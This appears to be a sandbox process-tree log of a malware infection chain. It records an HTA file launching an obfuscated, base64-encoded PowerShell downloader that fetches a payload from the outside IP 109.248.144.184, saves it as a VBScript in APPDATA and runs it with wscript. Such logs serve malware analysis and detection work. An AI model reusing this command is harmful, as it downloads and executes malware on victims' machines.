iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\wesharelovetogethreforgetbestthingsonherefor.hta.html
2144cmd.exe "C:\Windows\system32\cmd.exe" "/c poWershell.exe -ex bYPass -NOp -w 1 -C dEviCEcREDENtIaLDePlOymeNT.ExE ; iex($(IEX('[system.teXT.ENcODInG]'+[ChaR]58+[CHAR]0X3a+'utF8.GEtSTrInG([sYStEm.ConvErT]'+[chAR]58+[Char]0X3a+'fROmBASE64strInG('+[CHAR]0x22+'JDlKNm5pICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW1UbGUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExrTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkVNZFZxWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl4bE1ZcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmdreGlVelpKaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieVVLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ3ZkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOUo2bmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDkuMjQ4LjE0NC4xODQveGFtcHAva2Jjby9ncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvdS5naWYiLCIkRU5WOkFQUERBVEFcZ3JlYXRkYXlzcmV0dXJuYmFja2RvbnR3b3JyeWZvcmxvdmVzdG95by52YnMiLDAsMCk7U1RBcnQtc0xlRXAoMyk7SW5WT2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvLnZicyI='+[cHaR]34+'))')))"
1692powershell.exe poWershell.exe -ex bYPass -NOp -w 1 -C dEviCEcREDENtIaLDePlOymeNT.ExE ; iex($(IEX('[system.teXT.ENcODInG]'+[ChaR]58+[CHAR]0X3a+'utF8.GEtSTrInG([sYStEm.ConvErT]'+[chAR]58+[Char]0X3a+'fROmBASE64strInG('+[CHAR]0x22+'JDlKNm5pICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUkRFZkluaXRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZW1UbGUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExrTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkVNZFZxWCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl4bE1ZcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmdreGlVelpKaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieVVLIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ3ZkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkOUo2bmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDkuMjQ4LjE0NC4xODQveGFtcHAva2Jjby9ncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvdS5naWYiLCIkRU5WOkFQUERBVEFcZ3JlYXRkYXlzcmV0dXJuYmFja2RvbnR3b3JyeWZvcmxvdmVzdG95by52YnMiLDAsMCk7U1RBcnQtc0xlRXAoMyk7SW5WT2tFLWl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxncmVhdGRheXNyZXR1cm5iYWNrZG9udHdvcnJ5Zm9ybG92ZXN0b3lvLnZicyI='+[cHaR]34+'))')))"
2548
csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\vmuxw6e3.cmdline"
2468
cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES5E63.tmp" "c:\Users\test22\AppData\Local\Temp\CSC5DE5.tmp"
2240
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\greatdaysreturnbackdontworryforlovestoyo.vbs"
2356